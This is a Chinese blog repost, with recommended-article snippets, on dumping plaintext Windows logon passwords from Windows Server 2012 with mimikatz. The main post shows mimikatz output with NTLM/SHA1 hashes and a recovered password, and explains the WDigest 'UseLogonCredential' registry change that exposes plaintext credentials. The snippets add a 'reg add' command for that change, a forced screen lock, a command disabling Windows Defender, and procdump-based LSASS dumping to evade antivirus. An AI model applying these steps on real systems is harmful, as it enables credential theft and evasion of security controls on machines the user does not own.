windows 2012 抓明文密码方法

最新推荐文章于 2021-09-22 08:00:00 发布
最新推荐文章于 2021-09-22 08:00:00 发布
阅读量417 收藏
点赞数
文章标签: 操作系统
原文链接:http://www.cnblogs.com/h4ck0ne/p/5382580.html
版权

windows 2012 抓明文密码方法

默认配置是抓不到明文密码了,神器mimikatz显示Password为null

Authentication Id : 0 ; 121279 (00000000:0001d9bf)

Session : Interactive from 1

User Name : mickey

Domain : WIN-B054LAOH5FC

Logon Server : WIN-B054LAOH5FC

Logon Time : 2014/2/7 16:13:37

SID : S-1-5-21-3697557613-2315859964-140861748-1001

msv :

[00000003] Primary

* Username : mickey

* Domain : WIN-B054LAOH5FC

* NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709

[00010000] CredentialKeys

* NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709

tspkg :

wdigest :

* Username : mickey

* Domain : WIN-B054LAOH5FC

* Password : (null)

kerberos :

* Username : mickey

* Domain : WIN-B054LAOH5FC

* Password : (null)

ssp : KO

credman :

需要HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest的"UseLogonCredential"设置为1,类型为DWORD 32才可以,然后下次用户再登录,就能记录到明文密码了。

Authentication Id : 0 ; 2506062 (00000000:00263d4e)

Session : Interactive from 2

User Name : mickey

Domain : WIN-B054LAOH5FC

Logon Server : WIN-B054LAOH5FC

Logon Time : 2015/5/11 11:47:35

SID : S-1-5-21-3697557613-2315859964-140861748-1001

msv :

[00010000] CredentialKeys

* NTLM : ad12521316a18d2172f20db07674c278

* SHA1 : 85b6b322a966fe19f758ee15fd7516c23c33cb7c

[00000003] Primary

* Username : mickey

* Domain : WIN-B054LAOH5FC

* NTLM : ad12521316a18d2172f20db07674c278

* SHA1 : 85b6b322a966fe19f758ee15fd7516c23c33cb7c

tspkg :

wdigest :

* Username : mickey

* Domain : WIN-B054LAOH5FC

* Password : AGeisNBVeryNB@wooyun.org

参考链接:http://www.labofapenetrationtester.com/2015/05/dumping-passwords-in-plain-on-windows-8-1.html

[原文地址]

转载于:https://www.cnblogs.com/h4ck0ne/p/5382580.html

weixin_30872499
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
cs与msf权限传递,mimikatz明文密码
m0_70638961的博客
05-28 349
由于Windows在win10或Windows2012R2以上时,默认的缓存表中是不存在明文密码的,显示为null,如图所示。创建foreign监听器-->msf监听模块设置端口-->cs执行新建会话选择创建的监听器。所以在这里我们明文的步骤是:手工修改注册表-->强制锁屏-->等待管理员重新登录。重新登录之后可以看到明文取成功。强制锁屏可以通过脚本来实现。到这里显示了msf界面就表示传递成功了。3.新建会话选择创建的监听器。
cs与msf权限传递,以及mimikatz取win2012明文密码
最新发布
qq_64395221的博客
05-31 331
环境搭建:攻击IP :10.11.17.22(kali cs服务端、msf所在主机)靶机IP:10.11.73.53(Windows2012
win10及win2012之后系统的明文取方式
聚鼎安全
03-29 3535
原文地址:https://www.anquanke.com/post/id/175364 明文:手工修改注册表 + 强制锁屏 + 等待目标系统管理员重新登录 = 截取明文密码 1.procdump+mimikatz获取win10/win2012 R2用户明文密码 测试环境:win10企业版和win2012 R2 版本 工具下载:链接:https://pan.baidu.c...
利用procdump+Mimikatz 绕过杀软获取Windows明文密码
热门推荐
冷风
09-30 2万+
Mimikatz现在已经内置在Metasploit’s meterpreter里面,我们可以通过meterpreter下载。但是你如果觉得还要考虑杀毒软件,绑定payload之类的东西太过复杂,我们可以有更好的办法,只需要在自己的电脑上运行Mimikatz alpha(地址)版本,然后处理dump的LSASS进程内存文件就行!那么如何dump LSASS进程内存呢。可以通过以下方式:1.对于NT6
Win2012 ServerHASH(本地+域)
mfkpie的专栏
08-25 8458
Win2012 ServerHASH(本地+域) 为避免文章过长,这里就不贴出详细测试过程了。经过我的测试,发现本地用户hash取的方法中,以下几种方式是可行的: hash:在线解密: http://www.objectif-securite.ch/ophcrack.php 注册表导出+cain Pwdump7.exe QuarksPwDump.exe mim
第一百零六课:windows 单机免杀明文或hash [通过简单混淆编码绕过常规静态检测]1
08-03
本课程主要探讨如何通过混淆、编码以及反射加载等技术来绕过常规的静态检测,从而执行如Mimikatz这样的工具来明文或哈希密码。 首先,简单混淆是一种常见的免杀手段。在描述中提到的例子中,使用了`sed`命令对...
mimikatz直接密码.zip
03-23
mimikatz是一个知名的开源工具,由法国安全研究员Benjamin Delpy开发,它允许安全研究人员和系统管理员在Windows操作系统下提取内存中的明文密码、会话凭证、 Kerberos票据等敏感数据。"直接密码"可能指的是...
winsock包工具
01-08
Winsock包工具是一种在Windows操作系统环境下用于网络数据包捕获和分析的软件。它能够帮助用户监控网络通信,解析并显示通过网络传输的数据包,包括HTTP、FTP、SMTP等协议的数据,对于网络安全分析、软件调试以及...
PasswordSeeker:winpcap包分析HTTP传输密码
07-01
**PasswordSeeker: 使用Winpcap进行HTTP传输密码包分析** PasswordSeeker是一个基于C++编程语言的应用程序,利用了Winpcap库来捕获和分析网络中的HTTP传输密码。Winpcap(Windows Packet Capturer)是网络数据包...
管理员密码神器--mimikatz
08-01
它主要用于提取操作系统中的敏感信息,包括但不限于明文密码、NTLM哈希、 Kerberos票证等。mimikatz以其简单易用和广泛的适用性,在网络安全领域尤其是渗透测试和安全研究中备受青睐。 ### 1. mimikatz的使用场景 ...
windows2012获取明文密码
weixin_30883311的博客
07-01 2161
windows 2012获取明文密码 导hash的话用常规的方法就可以。 修改注册表 reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest/v UseLogonCredential /t REG_DWORD /d 1 选项一:锁屏 rundll32.exe user32...
获取Windows明文密码的小技巧
09-22 1193
在实战中,拿到一台Windows服务器权限,如果可以直接获取Windows明文密码的话,就可以更容易深入挖掘。本文分享几个获取Windows明文密码的技巧,简单直接且有效。01、Procd...
关于Windows系列密码
weixin_30790841的博客
03-31 395
首先,还是回顾一下windows系统密码Hash的一些知识吧:(下面这段来自网络) 首先介绍一下windows密码Hash: 早期SMB协议在网络上传输明文口令。后来出现"LAN Manager Challenge/Response"验证机制,简称LM,它是如此简单以至很容易被破解。微软提出了WindowsNT挑战/响应验证机制,称之为NTLM。现在已经有了更新的...
神器 mimikatz - 直接Windows 明文密码
oceanark的博客
07-13 7443
昨天有朋友发了个法国佬写的神器叫 mimikatz让我们看下 神器下载地址: http://blog.gentilkiwi.com/mimikatz 还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章 http://pentestmonkey.net/blog/mimikatz-tool-to-recover-clear
mimikatz在Win10及2012系统以后的明文取方式
netsec_steven的博客
07-10 1万+
1.procdump+mimikatz获取win10/win2012 R2用户明文密码 测试环境:win10企业版和win2012 R2 版本 工具下载:链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38 原理:获取到内存文件lsass.exe进程(它用于本地安全和登陆策略)中存储的明文登录密码 利用前提:拿到了admin权限的cmd,管理员用密码登录机器,并运行了lsass.exe进程,把密码保存在内存文件lsass进程中。 .
Windows server 2012 用户hash方法研究(本地+域)
Coisini的博客
06-16 2150
为避免文章过长,这里就不贴出详细测试过程了。经过我的测试,发现本地用户hash取的方法中,以下几种方式是可行的: 注册表导出+cain Pwdump7.exe QuarksPwDump.exe mimikatz.exe 这几种方式都可以到本地用户hash,其中mimikatz.exe只能到登陆过的账户的hash值, 已经取不到明文密码了,但是,有一些有意思的东西,直接上图: 仔细看图...
Windows Server 2016明文密码
BaCde's Blog
03-13 1917
临时禁止Windows Defender REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f gpupdate /force 下载mimikatz后解压缩。 powershell.exe -NoP -NonI -Ex...
Windows API编程:获取密码文本方法详解
"获取编辑框里的密码文本的代码详解——Windows API 编程" 在Windows API编程中,常常需要处理各种控件,如编辑框(Edit Control)。编辑框用于输入文本,有时是明文,有时是密码模式,比如显示星号或圆点。当处理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值